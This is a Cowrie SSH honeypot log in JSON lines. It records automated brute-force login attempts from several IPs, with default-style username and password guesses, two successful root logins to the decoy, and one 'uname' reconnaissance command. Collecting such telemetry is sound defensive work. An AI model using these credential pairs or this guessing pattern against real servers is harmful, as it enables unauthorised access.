{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:33.097683Z","src_ip":"83.168.105.65","session":"97770153f6ea"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:33.211240Z","src_ip":"83.168.105.65","session":"97770153f6ea"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:34.250410Z","src_ip":"83.168.105.65","session":"97770153f6ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40368,"dst_ip":"1.2.3.4","dst_port":22,"session":"0114a9c360b1","protocol":"ssh","message":"New connection: 212.227.125.160:40368 (1.2.3.4:22) [session: 0114a9c360b1]","sensor":"my-vps","timestamp":"2025-08-26T11:38:34.366689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:34.367839Z","src_ip":"212.227.125.160","session":"0114a9c360b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:34.421911Z","src_ip":"212.227.125.160","session":"0114a9c360b1"}
{"eventid":"cowrie.login.failed","username":"cbm","password":"cbm","message":"login attempt [cbm/cbm] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:34.578614Z","src_ip":"212.227.125.160","session":"0114a9c360b1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:35.631078Z","src_ip":"212.227.125.160","session":"0114a9c360b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":9146,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff3f64d276c8","protocol":"ssh","message":"New connection: 212.227.125.160:9146 (1.2.3.4:22) [session: ff3f64d276c8]","sensor":"my-vps","timestamp":"2025-08-26T11:38:40.624456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:40.625472Z","src_ip":"212.227.125.160","session":"ff3f64d276c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:40.678141Z","src_ip":"212.227.125.160","session":"ff3f64d276c8"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:40.873345Z","src_ip":"212.227.125.160","session":"ff3f64d276c8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:41.932225Z","src_ip":"212.227.125.160","session":"ff3f64d276c8"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36746,"dst_ip":"1.2.3.4","dst_port":22,"session":"b341562da428","protocol":"ssh","message":"New connection: 196.251.86.249:36746 (1.2.3.4:22) [session: b341562da428]","sensor":"my-vps","timestamp":"2025-08-26T11:38:42.814760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:43.571905Z","src_ip":"196.251.86.249","session":"b341562da428"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:38:43.572673Z","src_ip":"196.251.86.249","session":"b341562da428"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"321123","message":"login attempt [hadoop/321123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:45.328162Z","src_ip":"196.251.86.249","session":"b341562da428"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41902,"dst_ip":"1.2.3.4","dst_port":22,"session":"1830931d0901","protocol":"ssh","message":"New connection: 212.227.125.160:41902 (1.2.3.4:22) [session: 1830931d0901]","sensor":"my-vps","timestamp":"2025-08-26T11:38:46.086047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:46.137147Z","src_ip":"212.227.125.160","session":"1830931d0901"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:46.225702Z","src_ip":"212.227.125.160","session":"1830931d0901"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:38:46.495803Z","src_ip":"212.227.125.160","session":"1830931d0901"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:38:46.637384Z","src_ip":"212.227.125.160","session":"1830931d0901"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:38:46.638349Z","src_ip":"212.227.125.160","session":"1830931d0901"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:46.809170Z","src_ip":"212.227.125.160","session":"1830931d0901"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:46.810404Z","src_ip":"212.227.125.160","session":"1830931d0901"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:46.910450Z","src_ip":"196.251.86.249","session":"b341562da428"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35418,"dst_ip":"1.2.3.4","dst_port":22,"session":"d552d5aed61e","protocol":"ssh","message":"New connection: 83.168.105.65:35418 (1.2.3.4:22) [session: d552d5aed61e]","sensor":"my-vps","timestamp":"2025-08-26T11:38:48.630807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:48.631559Z","src_ip":"83.168.105.65","session":"d552d5aed61e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:48.670826Z","src_ip":"83.168.105.65","session":"d552d5aed61e"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:48.790082Z","src_ip":"83.168.105.65","session":"d552d5aed61e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:49.832178Z","src_ip":"83.168.105.65","session":"d552d5aed61e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42674,"dst_ip":"1.2.3.4","dst_port":22,"session":"657d4e1b949e","protocol":"ssh","message":"New connection: 212.227.125.160:42674 (1.2.3.4:22) [session: 657d4e1b949e]","sensor":"my-vps","timestamp":"2025-08-26T11:38:52.135967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:52.137428Z","src_ip":"212.227.125.160","session":"657d4e1b949e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:52.196190Z","src_ip":"212.227.125.160","session":"657d4e1b949e"}
{"eventid":"cowrie.login.failed","username":"astra_user","password":"astra_user","message":"login attempt [astra_user/astra_user] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:52.412327Z","src_ip":"212.227.125.160","session":"657d4e1b949e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:53.464585Z","src_ip":"212.227.125.160","session":"657d4e1b949e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43440,"dst_ip":"1.2.3.4","dst_port":22,"session":"2da852987c8e","protocol":"ssh","message":"New connection: 212.227.125.160:43440 (1.2.3.4:22) [session: 2da852987c8e]","sensor":"my-vps","timestamp":"2025-08-26T11:38:57.956895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:38:57.958803Z","src_ip":"212.227.125.160","session":"2da852987c8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:38:58.045370Z","src_ip":"212.227.125.160","session":"2da852987c8e"}
{"eventid":"cowrie.login.failed","username":"postgresql","password":"postgresql","message":"login attempt [postgresql/postgresql] failed","sensor":"my-vps","timestamp":"2025-08-26T11:38:58.556720Z","src_ip":"212.227.125.160","session":"2da852987c8e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:38:59.608304Z","src_ip":"212.227.125.160","session":"2da852987c8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44210,"dst_ip":"1.2.3.4","dst_port":22,"session":"131d478acad9","protocol":"ssh","message":"New connection: 212.227.125.160:44210 (1.2.3.4:22) [session: 131d478acad9]","sensor":"my-vps","timestamp":"2025-08-26T11:39:03.656633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:03.697432Z","src_ip":"212.227.125.160","session":"131d478acad9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:03.747008Z","src_ip":"212.227.125.160","session":"131d478acad9"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":43970,"dst_ip":"1.2.3.4","dst_port":22,"session":"38a22721e84a","protocol":"ssh","message":"New connection: 83.168.105.65:43970 (1.2.3.4:22) [session: 38a22721e84a]","sensor":"my-vps","timestamp":"2025-08-26T11:39:04.376704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:04.377684Z","src_ip":"83.168.105.65","session":"38a22721e84a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:04.417904Z","src_ip":"83.168.105.65","session":"38a22721e84a"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:04.540885Z","src_ip":"83.168.105.65","session":"38a22721e84a"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:39:04.624365Z","src_ip":"212.227.125.160","session":"131d478acad9"}
